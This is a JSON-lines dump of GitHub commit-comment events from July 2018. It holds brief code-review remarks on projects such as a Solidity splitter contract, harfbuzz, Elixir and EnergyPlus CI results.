{"id":"7950722871","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"Fr0stweaver/GoMint"},"payload":{"comment":{"id":29672648,"position":null,"line":null,"path":null,"commit_id":"8f4a4e5d6f7977f2d80a657dfcebb545fe7a76e3","created_at":"2018-07-11T15:05:55Z","updated_at":"2018-07-11T15:05:55Z","author_association":"NONE","body":"Ah"}},"created_at":"2018-07-11T15:05:55Z"}
{"id":"7950726508","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29672654,"position":81,"line":81,"path":"css/main.css","commit_id":"b5221832203b8cdc6e246d3009f3e0b6685b391c","created_at":"2018-07-11T15:06:27Z","updated_at":"2018-07-11T15:06:27Z","author_association":"NONE","body":"так, так left, top, position absolute. \r\nПочему ты используешь абсолютное позиционирование?"}},"created_at":"2018-07-11T15:06:27Z"}
{"id":"7950728316","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29672656,"position":195,"line":195,"path":"css/main.css","commit_id":"b5221832203b8cdc6e246d3009f3e0b6685b391c","created_at":"2018-07-11T15:06:42Z","updated_at":"2018-07-11T15:06:42Z","author_association":"NONE","body":"BEM?"}},"created_at":"2018-07-11T15:06:42Z"}
{"id":"7950728565","type":"CommitCommentEvent","actor":{"login":"bitkis"},"repo":{"name":"graft-project/graft-ng"},"payload":{"comment":{"id":29672658,"position":37,"line":81,"path":"include/connection.h","commit_id":"e34eb9c4764925b5b04dc610c4165f531a99a12e","created_at":"2018-07-11T15:06:44Z","updated_at":"2018-07-11T15:06:44Z","author_association":"COLLABORATOR","body":"should it indeed be static?"}},"created_at":"2018-07-11T15:06:44Z"}
{"id":"7950731613","type":"CommitCommentEvent","actor":{"login":"AnontheAnonomys"},"repo":{"name":"FarragoFiction/LOHAESim"},"payload":{"comment":{"id":29672665,"position":null,"line":null,"path":null,"commit_id":"866077c4a3d7c4b187ca0256eb190d191af1f13a","created_at":"2018-07-11T15:07:14Z","updated_at":"2018-07-11T15:07:14Z","author_association":"NONE","body":"Assroots"}},"created_at":"2018-07-11T15:07:14Z"}
{"id":"7950731877","type":"CommitCommentEvent","actor":{"login":"antlarr-suse"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29672666,"position":58,"line":111,"path":"bard/bard_ext.cpp","commit_id":"8759edb15433fbd5548ec4b10aa9ff5f9f763659","created_at":"2018-07-11T15:07:17Z","updated_at":"2018-07-11T15:07:17Z","author_association":"CONTRIBUTOR","body":"Thanks for the suggestion, but I think in this case it isn't worth using std::lock_guard. It's useful for cases where there are multiple exit points of a function with some complex code, but here the code is so simple (I just need to protect a single line that shouldn't throw any exception) that it would probably be slower to create a lock_guard object in the stack just to destroy it two lines below."}},"created_at":"2018-07-11T15:07:17Z"}
{"id":"7950732197","type":"CommitCommentEvent","actor":{"login":"slavapestov"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29672669,"position":135,"line":1370,"path":"lib/Sema/TypeCheckDeclOverride.cpp","commit_id":"fb582593b792ad17659c974ed0a963b68cebda18","created_at":"2018-07-11T15:07:20Z","updated_at":"2018-07-11T15:07:20Z","author_association":"MEMBER","body":"Heh"}},"created_at":"2018-07-11T15:07:20Z"}
{"id":"7950737315","type":"CommitCommentEvent","actor":{"login":"knight-of-ni"},"repo":{"name":"ZoneMinder/zoneminder"},"payload":{"comment":{"id":29672673,"position":null,"line":null,"path":null,"commit_id":"a6b44d2ab5f5e0cf21bbf4fe3820ebec7e677ab2","created_at":"2018-07-11T15:08:06Z","updated_at":"2018-07-11T15:08:06Z","author_association":"MEMBER","body":"The latest ZoneMinder uses jquery-ui-timepicker for the calendar popup instead of jscalendar"}},"created_at":"2018-07-11T15:08:06Z"}
{"id":"7950739771","type":"CommitCommentEvent","actor":{"login":"cs-counterflow"},"repo":{"name":"OPNids/core"},"payload":{"comment":{"id":29672678,"position":null,"line":null,"path":null,"commit_id":"6b250c6736f662e3535719e0caa5752383794590","created_at":"2018-07-11T15:08:29Z","updated_at":"2018-07-11T15:08:29Z","author_association":"NONE","body":"@MaxOrelus , looks like line number 278 ( <dhcpd/> ) needs to go to."}},"created_at":"2018-07-11T15:08:29Z"}
{"id":"7950741830","type":"CommitCommentEvent","actor":{"login":"e-shere"},"repo":{"name":"martynwinn/map-recognition"},"payload":{"comment":{"id":29672681,"position":null,"line":null,"path":null,"commit_id":"81ee04d4774a327e56b71c4763a879aaa9d89972","created_at":"2018-07-11T15:08:48Z","updated_at":"2018-07-11T15:08:48Z","author_association":"COLLABORATOR","body":"outputs images into EM_slices_sobel, so if training on these the \"dirin\" in em_image_classify needs to be changed"}},"created_at":"2018-07-11T15:08:48Z"}
{"id":"7950744100","type":"CommitCommentEvent","actor":{"login":"ross"},"repo":{"name":"aaronkaplan/Reference-Security-Incident-Taxonomy-Task-Force"},"payload":{"comment":{"id":29672684,"position":null,"line":null,"path":null,"commit_id":"c4772b41222f6ca0ddf31d59c9258c683036a83b","created_at":"2018-07-11T15:09:10Z","updated_at":"2018-07-11T15:09:10Z","author_association":"NONE","body":"@aaronkaplan I assume you have the wrong @ross"}},"created_at":"2018-07-11T15:09:10Z"}
{"id":"7950744789","type":"CommitCommentEvent","actor":{"login":"antlarr"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29672685,"position":58,"line":111,"path":"bard/bard_ext.cpp","commit_id":"8759edb15433fbd5548ec4b10aa9ff5f9f763659","created_at":"2018-07-11T15:09:16Z","updated_at":"2018-07-11T15:09:16Z","author_association":"OWNER","body":"Thanks for the suggestion, but I think in this case it isn't worth using std::lock_guard. It's useful for cases where there are multiple exit points of a function with some complex code, but here the code is so simple (I just need to protect a single line that shouldn't throw any exception) that it would probably be slower to create a lock_guard object in the stack just to destroy it two lines below."}},"created_at":"2018-07-11T15:09:16Z"}
{"id":"7950748639","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29672691,"position":4,"line":87,"path":"src/hb-private.hh","commit_id":"bca83618cda7ee4f683b4685d10db9e1bef4983c","created_at":"2018-07-11T15:09:51Z","updated_at":"2018-07-11T15:09:51Z","author_association":"NONE","body":"Did you mean `!__has_feature(cxx_constexpr)`? Otherwise, broken with Clang 3.4.1, see [error log](https://ptpb.pw/Hh6g).\r\n\r\n```c++\r\nIn file included from hb-blob.cc:33:\r\n./hb-private.hh:98:10: error: unknown type name 'constexpr'\r\n  static constexpr unsigned int value = offsetof (s, t);\r\n         ^\r\n./hb-private.hh:98:20: error: expected member name or ';' after declaration specifiers\r\n  static constexpr unsigned int value = offsetof (s, t);\r\n  ~~~~~~~~~~~~~~~~ ^\r\n```\r\n"}},"created_at":"2018-07-11T15:09:51Z"}
{"id":"7950748998","type":"CommitCommentEvent","actor":{"login":"dluksza"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29672692,"position":19,"line":368,"path":"android/src/main/java/io/invertase/firebase/notifications/RNFirebaseNotificationManager.java","commit_id":"886efcaa624aafd48a8ec56e219d0e4190e56942","created_at":"2018-07-11T15:09:54Z","updated_at":"2018-07-11T15:09:54Z","author_association":"CONTRIBUTOR","body":"@Salakar here is my PR https://github.com/invertase/react-native-firebase/pull/1294\r\n\r\nBTW. I'm handling this case in client code (on the RN side) and could argue that it should be properly handled by lib consumers, then by lib itself."}},"created_at":"2018-07-11T15:09:54Z"}
{"id":"7950755163","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672701,"position":4,"line":4,"path":"contracts/Ownable.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-11T15:10:53Z","updated_at":"2018-07-11T15:10:53Z","author_association":"NONE","body":"Because it is `public`, it is possible for the developer to overwrite this value from a child contract. Is this ok? "}},"created_at":"2018-07-11T15:10:53Z"}
{"id":"7950757376","type":"CommitCommentEvent","actor":{"login":"ace411"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29672709,"position":27,"line":19,"path":"src/Algorithms/Max.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T15:11:14Z","updated_at":"2018-07-11T15:11:14Z","author_association":"OWNER","body":"What about the code in this block is not readable? I reduced the block size - that's it!"}},"created_at":"2018-07-11T15:11:14Z"}
{"id":"7950763331","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672718,"position":15,"line":21,"path":"contracts/Pausable.sol","commit_id":"b0c2efdd7605c0dbc254e2632241316c791a47f5","created_at":"2018-07-11T15:12:09Z","updated_at":"2018-07-11T15:12:09Z","author_association":"NONE","body":"If I send the same tx twice, do I emit the same event twice?"}},"created_at":"2018-07-11T15:12:09Z"}
{"id":"7950766187","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672722,"position":5,"line":9,"path":"contracts/Pausable.sol","commit_id":"b0c2efdd7605c0dbc254e2632241316c791a47f5","created_at":"2018-07-11T15:12:35Z","updated_at":"2018-07-11T15:12:35Z","author_association":"NONE","body":"You can add `indexed` here too."}},"created_at":"2018-07-11T15:12:35Z"}
{"id":"7950767054","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29672725,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-11T15:12:43Z","updated_at":"2018-07-11T15:12:43Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-MacOS-10.9-clang: OK (2933 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T15:12:43Z"}
{"id":"7950774560","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672731,"position":43,"line":34,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-11T15:13:45Z","updated_at":"2018-07-11T15:13:45Z","author_association":"NONE","body":"Consider keeping the spacing consistent around `=`.\r\n😇 "}},"created_at":"2018-07-11T15:13:45Z"}
{"id":"7950779844","type":"CommitCommentEvent","actor":{"login":"MaxOrelus"},"repo":{"name":"OPNids/core"},"payload":{"comment":{"id":29672739,"position":null,"line":null,"path":null,"commit_id":"6b250c6736f662e3535719e0caa5752383794590","created_at":"2018-07-11T15:14:30Z","updated_at":"2018-07-11T15:14:30Z","author_association":"CONTRIBUTOR","body":"The `/` closes the tag, it's standard XML shorthand rather than doing `<dhcpd></dhcpd>`"}},"created_at":"2018-07-11T15:14:30Z"}
{"id":"7950781203","type":"CommitCommentEvent","actor":{"login":"sven-n"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29672741,"position":null,"line":null,"path":null,"commit_id":"d6c33640b02d32b4f2f441475f947c19808ea2d5","created_at":"2018-07-11T15:14:42Z","updated_at":"2018-07-11T15:14:42Z","author_association":"MEMBER","body":"Well, this code primarily uses numerical values because it's initially generated out of configuration text files with regex search & replace (here on Skills.txt). I didn't have time yet to come up with a better solution, but for new parameter I prefer to have it a bit more readable."}},"created_at":"2018-07-11T15:14:42Z"}
{"id":"7950781934","type":"CommitCommentEvent","actor":{"login":"Marcolry"},"repo":{"name":"mnielsen/neural-networks-and-deep-learning"},"payload":{"comment":{"id":29672742,"position":null,"line":null,"path":null,"commit_id":"ddf26dcfa085cdccd076b7d222cce1482338eb64","created_at":"2018-07-11T15:14:48Z","updated_at":"2018-07-11T15:14:48Z","author_association":"NONE","body":"Thanks for the time you put it in man !"}},"created_at":"2018-07-11T15:14:48Z"}
{"id":"7950783690","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672748,"position":23,"line":8,"path":"contracts/Splitter.sol","commit_id":"818ea30a9e61ca05ea6c9d9330877985c0fdb171","created_at":"2018-07-11T15:15:04Z","updated_at":"2018-07-11T15:15:04Z","author_association":"NONE","body":"This is contrary to the Solidity style guide. use `SplitTransaction` or `LogSplitTransaction`. Not sure `Transaction` is necessary, sounds ambiguous; an event can only be emitted as part of a tx."}},"created_at":"2018-07-11T15:15:04Z"}
{"id":"7950785421","type":"CommitCommentEvent","actor":{"login":"GodloveD"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":29672751,"position":11,"line":11,"path":"debian/changelog","commit_id":"41229565eedb14b196423e603fee23141a780a18","created_at":"2018-07-11T15:15:20Z","updated_at":"2018-07-11T15:15:20Z","author_association":"MEMBER","body":"Ah.  Great catch.  I should go through and see what others may have been missed.  "}},"created_at":"2018-07-11T15:15:20Z"}
{"id":"7950789927","type":"CommitCommentEvent","actor":{"login":"slamer59"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29672758,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-11T15:15:59Z","updated_at":"2018-07-11T15:15:59Z","author_association":"NONE","body":"Hi,\r\nEigen seems to point to a wrong repository now. Error 404\r\nhttps://github.com/RLovelett/eigen\r\n\r\nIt works for me pointing to https://github.com/eigenteam/eigen-git-mirror/\r\n"}},"created_at":"2018-07-11T15:15:59Z"}
{"id":"7950789939","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672760,"position":38,"line":31,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-11T15:16:00Z","updated_at":"2018-07-11T15:16:00Z","author_association":"NONE","body":"`half` can be declared and assigned in one go, no need to make us go back and forth."}},"created_at":"2018-07-11T15:16:00Z"}
{"id":"7950791738","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29672761,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-11T15:16:16Z","updated_at":"2018-07-11T15:16:16Z","author_association":"NONE","body":"The commands don't seem to be working, any suggestions on what I'm doing wrong?"}},"created_at":"2018-07-11T15:16:16Z"}
{"id":"7950793211","type":"CommitCommentEvent","actor":{"login":"GodloveD"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":29672763,"position":3,"line":2,"path":"configure.ac","commit_id":"41229565eedb14b196423e603fee23141a780a18","created_at":"2018-07-11T15:16:29Z","updated_at":"2018-07-11T15:16:29Z","author_association":"MEMBER","body":"Yes.  I usually increment the version numbers without a PR.  I'm looking at the travis problem right now.  I think it's just an issue in Travis and not an issue with the commit. "}},"created_at":"2018-07-11T15:16:29Z"}
{"id":"7950795254","type":"CommitCommentEvent","actor":{"login":"cs-counterflow"},"repo":{"name":"OPNids/core"},"payload":{"comment":{"id":29672766,"position":null,"line":null,"path":null,"commit_id":"6b250c6736f662e3535719e0caa5752383794590","created_at":"2018-07-11T15:16:48Z","updated_at":"2018-07-11T15:16:48Z","author_association":"NONE","body":"TNX\r\n"}},"created_at":"2018-07-11T15:16:48Z"}
{"id":"7950799161","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672771,"position":2,"line":2,"path":"test/Splitter.js","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-11T15:17:24Z","updated_at":"2018-07-11T15:17:24Z","author_association":"NONE","body":"I think it is better to say `const Promise = ...`. Otherwise you are at risk of overwriting the `Promise` that Truffle expects as part of its tooling."}},"created_at":"2018-07-11T15:17:24Z"}
{"id":"7950802346","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672778,"position":9,"line":9,"path":"test/Splitter.js","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-11T15:17:53Z","updated_at":"2018-07-11T15:17:53Z","author_association":"NONE","body":"`const accountCarol = `?"}},"created_at":"2018-07-11T15:17:53Z"}
{"id":"7950804645","type":"CommitCommentEvent","actor":{"login":"lez"},"repo":{"name":"pts/pts-dropbear"},"payload":{"comment":{"id":29672779,"position":null,"line":null,"path":null,"commit_id":"432c3f9dd5d51988c6d09a4ee73024de59707234","created_at":"2018-07-11T15:18:15Z","updated_at":"2018-07-11T15:18:15Z","author_association":"NONE","body":"Wow! Thanks for the instant fix! Really appreciate it!"}},"created_at":"2018-07-11T15:18:15Z"}
{"id":"7950805219","type":"CommitCommentEvent","actor":{"login":"jordan-castelloe"},"repo":{"name":"Aux5/Spoodify"},"payload":{"comment":{"id":29672781,"position":null,"line":null,"path":null,"commit_id":"7e1279b2e2372f7c9f05f11f832826765541572b","created_at":"2018-07-11T15:18:20Z","updated_at":"2018-07-11T15:18:20Z","author_association":"NONE","body":"This looks good, Brett! Good job! 👍 "}},"created_at":"2018-07-11T15:18:20Z"}
{"id":"7950806896","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672783,"position":26,"line":26,"path":"test/Splitter.js","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-11T15:18:36Z","updated_at":"2018-07-11T15:18:36Z","author_association":"NONE","body":"Avoid reusing `.deployed()` and instead create a new instance for each `it`. By reusing `.deployed`, you make your next `it` dependent on the previous one. That is not good practice."}},"created_at":"2018-07-11T15:18:36Z"}
{"id":"7950806953","type":"CommitCommentEvent","actor":{"login":"ukhryab"},"repo":{"name":"ukhryab/hubot-happy-birthder"},"payload":{"comment":{"id":29672784,"position":4,"line":5,"path":"index.js","commit_id":"02e35feeba1974c94fcd23594dcd1c2d9a42f80b","created_at":"2018-07-11T15:18:37Z","updated_at":"2018-07-11T15:18:37Z","author_association":"OWNER","body":"It should be squashed with previous one ('test'). Originally it was: \r\n`//   list birthdays - shows a list of users and their birthdays`\r\nThe thing is that I can test the bot only by commiting and pushing changes to repo."}},"created_at":"2018-07-11T15:18:37Z"}
{"id":"7950811359","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672795,"position":10,"line":23,"path":"test/Splitter.js","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-11T15:19:15Z","updated_at":"2018-07-11T15:19:15Z","author_association":"NONE","body":"`from: `? Don't leave it to chance."}},"created_at":"2018-07-11T15:19:15Z"}
{"id":"7950812004","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29672796,"position":null,"line":null,"path":null,"commit_id":"11ce47f3defa98a3c65ec2eb401c2d2997236458","created_at":"2018-07-11T15:19:20Z","updated_at":"2018-07-11T15:19:20Z","author_association":"MEMBER","body":"can we keep it to the hdskins package?"}},"created_at":"2018-07-11T15:19:20Z"}
{"id":"7950813925","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29672799,"position":null,"line":null,"path":null,"commit_id":"8e2e68664044fb993f55316ee0cf9360c8af24b9","created_at":"2018-07-11T15:19:37Z","updated_at":"2018-07-11T15:19:37Z","author_association":"COLLABORATOR","body":"Well done for working out the use of `{literal}` to deal with `{` and `}` characters."}},"created_at":"2018-07-11T15:19:37Z"}
{"id":"7950817031","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672808,"position":10,"line":23,"path":"test/Splitter.js","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-11T15:20:06Z","updated_at":"2018-07-11T15:20:06Z","author_association":"NONE","body":"`getStopSwitch` is a better function name."}},"created_at":"2018-07-11T15:20:06Z"}
{"id":"7950819347","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672815,"position":13,"line":26,"path":"test/Splitter.js","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-11T15:20:26Z","updated_at":"2018-07-11T15:20:26Z","author_association":"NONE","body":"`assert.isFalse(status,`"}},"created_at":"2018-07-11T15:20:26Z"}
{"id":"7950821494","type":"CommitCommentEvent","actor":{"login":"mariusbutuc"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29672822,"position":6,"line":5,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T15:20:46Z","updated_at":"2018-07-11T15:20:46Z","author_association":"CONTRIBUTOR","body":"Looking at `Behaviour` and `HashDict`, would an extra _This module is deprecated._ sentence fit in here?\r\n\r\nMight be asking this just for symmetry, or… does this matter?"}},"created_at":"2018-07-11T15:20:46Z"}
{"id":"7950824976","type":"CommitCommentEvent","actor":{"login":"c3budiman"},"repo":{"name":"GuccUg/Career-UG"},"payload":{"comment":{"id":29672833,"position":null,"line":null,"path":null,"commit_id":"a7b66042f97e94ddc2d88f9d5e1ae0eb4b8aed60","created_at":"2018-07-11T15:21:18Z","updated_at":"2018-07-11T15:21:18Z","author_association":"NONE","body":"jangan gunain sql ya, nanti susah harus import dulu, kalo pake migrasi tinggal php artisan migrate sinkronin db nya."}},"created_at":"2018-07-11T15:21:18Z"}
{"id":"7950825202","type":"CommitCommentEvent","actor":{"login":"yurisi0212"},"repo":{"name":"yurisi0212/musicplayer-test-"},"payload":{"comment":{"id":29672834,"position":null,"line":null,"path":null,"commit_id":"a5770e93bdabd92c0ee43caa965034f5348ebb4e","created_at":"2018-07-11T15:21:20Z","updated_at":"2018-07-11T15:21:20Z","author_association":"OWNER","body":"テスト用の音楽までアップロードしてしまった"}},"created_at":"2018-07-11T15:21:20Z"}
{"id":"7950826674","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672838,"position":80,"line":78,"path":"test/Splitter.js","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-11T15:21:34Z","updated_at":"2018-07-11T15:21:34Z","author_association":"NONE","body":"You just created a global variable. You should scope it with `let balance_Carol_before;` at the proper location."}},"created_at":"2018-07-11T15:21:34Z"}
{"id":"7950829562","type":"CommitCommentEvent","actor":{"login":"AndriyShymoniak"},"repo":{"name":"AndriyShymoniak/MyFirstRepository"},"payload":{"comment":{"id":29672848,"position":5,"line":5,"path":"hello.txt","commit_id":"48a419075cf70aa8c9b0fe71564399664457e5de","created_at":"2018-07-11T15:21:59Z","updated_at":"2018-07-11T15:21:59Z","author_association":"OWNER","body":"kavo?\r\n"}},"created_at":"2018-07-11T15:21:59Z"}
{"id":"7950829746","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672849,"position":87,"line":83,"path":"test/Splitter.js","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-11T15:22:01Z","updated_at":"2018-07-11T15:22:01Z","author_association":"NONE","body":"Use smaller values in your tests, otherwise you will deplete too fast."}},"created_at":"2018-07-11T15:22:01Z"}
{"id":"7950832339","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672853,"position":91,"line":85,"path":"test/Splitter.js","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-11T15:22:25Z","updated_at":"2018-07-11T15:22:25Z","author_association":"NONE","body":"`.then(txObj =>`. Check that the status and logs are ok."}},"created_at":"2018-07-11T15:22:25Z"}
{"id":"7950832400","type":"CommitCommentEvent","actor":{"login":"mariusbutuc"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29672854,"position":6,"line":5,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T15:22:26Z","updated_at":"2018-07-11T15:22:26Z","author_association":"CONTRIBUTOR","body":"Same goes for `GenEvent` and `Supervisor.Spec`."}},"created_at":"2018-07-11T15:22:26Z"}
{"id":"7950834398","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672857,"position":1,"line":1,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:22:45Z","updated_at":"2018-07-11T15:22:45Z","author_association":"OWNER","body":"### **+Code 200--Job Found**"}},"created_at":"2018-07-11T15:22:45Z"}
{"id":"7950837830","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672862,"position":108,"line":97,"path":"test/Splitter.js","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-11T15:23:17Z","updated_at":"2018-07-11T15:23:17Z","author_association":"NONE","body":"I tend to prefer converting the numbers `.toString(10)` and do `assert.strictEqual`, like this the error message will contain the non-equal numbers."}},"created_at":"2018-07-11T15:23:17Z"}
{"id":"7950839042","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672863,"position":4,"line":4,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:23:27Z","updated_at":"2018-07-11T15:23:27Z","author_association":"OWNER","body":"### Getting Started"}},"created_at":"2018-07-11T15:23:27Z"}
{"id":"7950839109","type":"CommitCommentEvent","actor":{"login":"alexplusde"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":29672864,"position":null,"line":null,"path":null,"commit_id":"c0cb9024a899b2f61b127238edfd075f24dbb50f","created_at":"2018-07-11T15:23:27Z","updated_at":"2018-07-11T15:23:27Z","author_association":"CONTRIBUTOR","body":"Bindestrich fehlt"}},"created_at":"2018-07-11T15:23:27Z"}
{"id":"7950840829","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672868,"position":6,"line":97,"path":"test/Splitter.js","commit_id":"971e9a637b02069cbb8b3ec3f72451d6b04a38d7","created_at":"2018-07-11T15:23:43Z","updated_at":"2018-07-11T15:23:43Z","author_association":"NONE","body":"This is a synchronous call, can you use the promisified version?"}},"created_at":"2018-07-11T15:23:43Z"}
{"id":"7950843000","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29672873,"position":4,"line":87,"path":"src/hb-private.hh","commit_id":"bca83618cda7ee4f683b4685d10db9e1bef4983c","created_at":"2018-07-11T15:24:04Z","updated_at":"2018-07-11T15:24:04Z","author_association":"NONE","body":"Nevermind. The regression was introduced by a different commit."}},"created_at":"2018-07-11T15:24:04Z"}
{"id":"7950843972","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29672876,"position":122,"line":108,"path":"test/Splitter.js","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-11T15:24:14Z","updated_at":"2018-07-11T15:24:14Z","author_association":"NONE","body":"Can you use the promisified version of `.getBalance(`?"}},"created_at":"2018-07-11T15:24:14Z"}
{"id":"7950845635","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672879,"position":7,"line":7,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:24:29Z","updated_at":"2018-07-11T15:24:29Z","author_association":"OWNER","body":"_git clone [git clone https://github.com/lmaaronson/code200-job-found]_"}},"created_at":"2018-07-11T15:24:29Z"}
